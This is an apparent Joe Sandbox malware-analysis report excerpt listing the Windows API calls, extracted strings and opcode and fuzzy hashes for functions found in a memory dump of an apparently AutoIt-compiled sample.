                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: 19f44c528b7e5abea0825d4d1ac18790980eaaad443783dafe772a9986d8c7eb
                                                            • Instruction ID: 917ef5fffc3a57cc7c7ed9f844dfdbd79d794eec9b2ceb5c0ae836a3080e28e3
                                                            • Opcode Fuzzy Hash: 19f44c528b7e5abea0825d4d1ac18790980eaaad443783dafe772a9986d8c7eb
                                                            • Instruction Fuzzy Hash: E0618A71914218BFDB20DFA4DC85EEE77F8EB09700F104199FA14A72A1C770AD55DBA0
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001F7135
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 001F718E
                                                            • VariantInit.OLEAUT32(?), ref: 001F71A0
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 001F71C0
                                                            • VariantCopy.OLEAUT32(?,?), ref: 001F7213
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 001F7227
                                                            • VariantClear.OLEAUT32(?), ref: 001F723C
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 001F7249
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001F7252
                                                            • VariantClear.OLEAUT32(?), ref: 001F7264
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001F726F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 07bf8713042e1e4a94f8dbaf4b1205ef57eedf490c0148e71fc0c34ce46978f3
                                                            • Instruction ID: 301ae8f17faa80afef60d1157cbd1ffb89ea1f268e8dcce4119001074e5ddfd3
                                                            • Opcode Fuzzy Hash: 07bf8713042e1e4a94f8dbaf4b1205ef57eedf490c0148e71fc0c34ce46978f3
                                                            • Instruction Fuzzy Hash: 95414035A0411DAFCB10EFA4DD489AEBBB9FF18354F008079FA15A7261DB70A946CB90
                                                            APIs
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • CoInitialize.OLE32 ref: 00218718
                                                            • CoUninitialize.OLE32 ref: 00218723
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00232BEC,?), ref: 00218783
                                                            • IIDFromString.OLE32(?,?), ref: 002187F6
                                                            • VariantInit.OLEAUT32(?), ref: 00218890
                                                            • VariantClear.OLEAUT32(?), ref: 002188F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: aa8d0c558ea260d4907631bbd8a64b0136e5b4b3c3498ad6d78c7655bd4af957
                                                            • Instruction ID: e378d66047688a8256ae2624d9810b5d8b5d3a9fcdcfe73f4f0dbabcfedec34b
                                                            • Opcode Fuzzy Hash: aa8d0c558ea260d4907631bbd8a64b0136e5b4b3c3498ad6d78c7655bd4af957
                                                            • Instruction Fuzzy Hash: 7A61F334628302AFD710DF64C989BAFB7E4AF65714F10091DF9819B291CB70ED99CB92
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00215AA6
                                                            • inet_addr.WSOCK32(?,?,?), ref: 00215AEB
                                                            • gethostbyname.WSOCK32(?), ref: 00215AF7
                                                            • IcmpCreateFile.IPHLPAPI ref: 00215B05
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00215B75
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00215B8B
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00215C00
                                                            • WSACleanup.WSOCK32 ref: 00215C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 8f022d4eb9d1f7773a8e225fb029f8122c1040cdf50dfcee9f5215db23fd22b6
                                                            • Instruction ID: ede5099daba6fc7ef227b704bafb0810f9b8ced595ac9b0b5eaf63f90cb5e93c
                                                            • Opcode Fuzzy Hash: 8f022d4eb9d1f7773a8e225fb029f8122c1040cdf50dfcee9f5215db23fd22b6
                                                            • Instruction Fuzzy Hash: 3B51C031218711EFDB20DF24DC49B6AB7E0EF94314F0489AAF555DB2A1DB70E991CB41
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0020B73B
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0020B7B1
                                                            • GetLastError.KERNEL32 ref: 0020B7BB
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0020B828
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 5831925f2e4029e848c5d944a06f5749bf28c874a9749689a147cd02cd349aa4
                                                            • Instruction ID: 5ef3df2a57627e9907b44fdec9ebec4e86a205d92a698aca40c3524b8be09c85
                                                            • Opcode Fuzzy Hash: 5831925f2e4029e848c5d944a06f5749bf28c874a9749689a147cd02cd349aa4
                                                            • Instruction Fuzzy Hash: 12310635A10305AFDB21EF64CC8AABEB7B4FF55700F108129E902DB2E2DB719952C751
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001F94F6
                                                            • GetDlgCtrlID.USER32 ref: 001F9501
                                                            • GetParent.USER32 ref: 001F951D
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 001F9520
                                                            • GetDlgCtrlID.USER32(?), ref: 001F9529
                                                            • GetParent.USER32(?), ref: 001F9545
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 001F9548
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: adcd3f1e79a901305ebb9bbb6283802a134c2ea372b0703cf9010a21dc3d6242
                                                            • Instruction ID: 448365bb4e0eb9f5c8fc31648f013e300a072b9bd5acbffcf538a88963c85876
                                                            • Opcode Fuzzy Hash: adcd3f1e79a901305ebb9bbb6283802a134c2ea372b0703cf9010a21dc3d6242
                                                            • Instruction Fuzzy Hash: 3A21C474A04208BBCF05ABA4CC85EFEBB79EF95300F500125BA61972E2DB755919DB20
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001F95DF
                                                            • GetDlgCtrlID.USER32 ref: 001F95EA
                                                            • GetParent.USER32 ref: 001F9606
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 001F9609
                                                            • GetDlgCtrlID.USER32(?), ref: 001F9612
                                                            • GetParent.USER32(?), ref: 001F962E
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 001F9631
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 0eea5116287419ef0045e10ad3ef0f11e56f3eba3a5aead145082f3a7cc4a189
                                                            • Instruction ID: 5731f50935b33a6487b8e14d30ea47c874d257b63eb8380da99e0f739e2d8053
                                                            • Opcode Fuzzy Hash: 0eea5116287419ef0045e10ad3ef0f11e56f3eba3a5aead145082f3a7cc4a189
                                                            • Instruction Fuzzy Hash: 7221C574A00208BBDF15ABA0CCC5EFEBB79EF59300F500126FA61972A1DB759919DB20
                                                            APIs
                                                            • GetParent.USER32 ref: 001F9651
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 001F9666
                                                            • _wcscmp.LIBCMT ref: 001F9678
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001F96F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: c225e224a8a88a26a667825037d68907dd6320a36425961fa3b452f71e5aa9d4
                                                            • Instruction ID: 50992c98c8f3eaa5a5ed156536bb859edb98e26ccac089cccfd15f264a381c58
                                                            • Opcode Fuzzy Hash: c225e224a8a88a26a667825037d68907dd6320a36425961fa3b452f71e5aa9d4
                                                            • Instruction Fuzzy Hash: 8811CA7A25830BBAF6153620EC0AFB6779CDB25771F20012AFF10E50D1FF61A965495C
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 0020419D
                                                            • __swprintf.LIBCMT ref: 002041AA
                                                              • Part of subcall function 001C38D8: __woutput_l.LIBCMT ref: 001C3931
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 002041D4
                                                            • LoadResource.KERNEL32(?,00000000), ref: 002041E0
                                                            • LockResource.KERNEL32(00000000), ref: 002041ED
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0020420D
                                                            • LoadResource.KERNEL32(?,00000000), ref: 0020421F
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0020422E
                                                            • LockResource.KERNEL32(?), ref: 0020423A
                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0020429B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                            • String ID:
                                                            • API String ID: 1433390588-0
                                                            • Opcode ID: 4dce8d056a84fe04fe531c7d4320e0a97bc3ec382dfffa86a70cc1bbe054c84e
                                                            • Instruction ID: a1a380b7875e208621c4ac89c6620a4817f628de137d4dfc524cada53e6b81bc
                                                            • Opcode Fuzzy Hash: 4dce8d056a84fe04fe531c7d4320e0a97bc3ec382dfffa86a70cc1bbe054c84e
                                                            • Instruction Fuzzy Hash: 8531A0B161520ABFDB11AFA0ED48EBB7BBCEF15301F008525FE15D6191D770DA628BA0
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00201700
                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00200778,?,00000001), ref: 00201714
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0020171B
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00200778,?,00000001), ref: 0020172A
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0020173C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00200778,?,00000001), ref: 00201755
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00200778,?,00000001), ref: 00201767
                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00200778,?,00000001), ref: 002017AC
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00200778,?,00000001), ref: 002017C1
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00200778,?,00000001), ref: 002017CC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 649da43740c28651e2ecad4871c9d816c1827ca3e7588d24fa14106b9627bada
                                                            • Instruction ID: 53ceaedcf2b335b6bc5e7fdf1a72f9f919ccfb34cfa14de8f5a48e48e6875b46
                                                            • Opcode Fuzzy Hash: 649da43740c28651e2ecad4871c9d816c1827ca3e7588d24fa14106b9627bada
                                                            • Instruction Fuzzy Hash: 4231A975610305BBEB219F64FE8CF79BBB9EB25715F108028F804866F1D7B49D608B60
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: ,,#$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-1875468495
                                                            • Opcode ID: 3f96b5d094ffea76040e60492cfc51fa8957be7b66067f7501656cdf2062e72b
                                                            • Instruction ID: b1fc696f84178ab83d04f0bb928c5447a8770102d3e286070cf1f074eaf629d4
                                                            • Opcode Fuzzy Hash: 3f96b5d094ffea76040e60492cfc51fa8957be7b66067f7501656cdf2062e72b
                                                            • Instruction Fuzzy Hash: 8C91CE70A20219ABDF20DFA5C858FEEB7F8EF65310F108159F515AB280D7B09995CFA0
                                                            APIs
                                                            • EnumChildWindows.USER32(?,001FAA64), ref: 001FA9A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: c07334e23f4666508b94f9f481724bad08562f4f445551ec84ae0eed50213e7c
                                                            • Instruction ID: 1d40c93fec1baf6dddccf853af5f6139285cf35fe95502a82b3c396ec98d73bb
                                                            • Opcode Fuzzy Hash: c07334e23f4666508b94f9f481724bad08562f4f445551ec84ae0eed50213e7c
                                                            • Instruction Fuzzy Hash: 8291C9B050020ADBDB08DFA0C481FF9FB75BF14354F908129DA9EA7151DF74AA99CB91
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 001A2EAE
                                                              • Part of subcall function 001A1DB3: GetClientRect.USER32(?,?), ref: 001A1DDC
                                                              • Part of subcall function 001A1DB3: GetWindowRect.USER32(?,?), ref: 001A1E1D
                                                              • Part of subcall function 001A1DB3: ScreenToClient.USER32(?,?), ref: 001A1E45
                                                            • GetDC.USER32 ref: 001DCF82
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001DCF95
                                                            • SelectObject.GDI32(00000000,00000000), ref: 001DCFA3
                                                            • SelectObject.GDI32(00000000,00000000), ref: 001DCFB8
                                                            • ReleaseDC.USER32(?,00000000), ref: 001DCFC0
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001DD04B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: 0ba88fc1bf041cf5a5c88f5a685fee3ad34013b4653f93bcde731ab616444fee
                                                            • Instruction ID: 02a2ffdfeffd7bc8bae2e8576081002b1b039246c4ff1f582093ebd165fd3f7e
                                                            • Opcode Fuzzy Hash: 0ba88fc1bf041cf5a5c88f5a685fee3ad34013b4653f93bcde731ab616444fee
                                                            • Instruction Fuzzy Hash: 2E71F735500205EFCF258F68D884AFA7BB5FF49310F14466AFD559A266C7318C92DFA0
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0022F910), ref: 0021903D
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0022F910), ref: 00219071
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002191EB
                                                            • SysFreeString.OLEAUT32(?), ref: 00219215
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: 37ef30c92331443203ca7ac7e392ba765013468e987115ad217f4cba23f207ff
                                                            • Instruction ID: f26da150918d09dffce0a01244c28f975b670df64cea4b55866e6603070c2dea
                                                            • Opcode Fuzzy Hash: 37ef30c92331443203ca7ac7e392ba765013468e987115ad217f4cba23f207ff
                                                            • Instruction Fuzzy Hash: A0F14A31A1010AEFCB14DF94C898EEEB7B9FF59314F108098F915AB250CB71AE96CB50
                                                            APIs
                                                            • _memset.LIBCMT ref: 0021F9C9
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0021FB5C
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0021FB80
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0021FBC0
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0021FBE2
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0021FD5E
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0021FD90
                                                            • CloseHandle.KERNEL32(?), ref: 0021FDBF
                                                            • CloseHandle.KERNEL32(?), ref: 0021FE36
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: 147aa02ce7a47d90657f59f2e07258f602276eb1473ac6a78ca9facebb20f098
                                                            • Instruction ID: 7a7f864e356605bd70bfc13963d97324462e9d82215b4769dec7ccdb9efe81b8
                                                            • Opcode Fuzzy Hash: 147aa02ce7a47d90657f59f2e07258f602276eb1473ac6a78ca9facebb20f098
                                                            • Instruction Fuzzy Hash: 3EE1C531214341DFC754EF24C991BABBBE0AF95314F14886DF8999B2A2DB31DC91CB52
                                                            APIs
                                                              • Part of subcall function 002048AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002038D3,?), ref: 002048C7
                                                              • Part of subcall function 002048AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002038D3,?), ref: 002048E0
                                                              • Part of subcall function 00204CD3: GetFileAttributesW.KERNEL32(?,00203947), ref: 00204CD4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00204FE2
                                                            • _wcscmp.LIBCMT ref: 00204FFC
                                                            • MoveFileW.KERNEL32(?,?), ref: 00205017
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
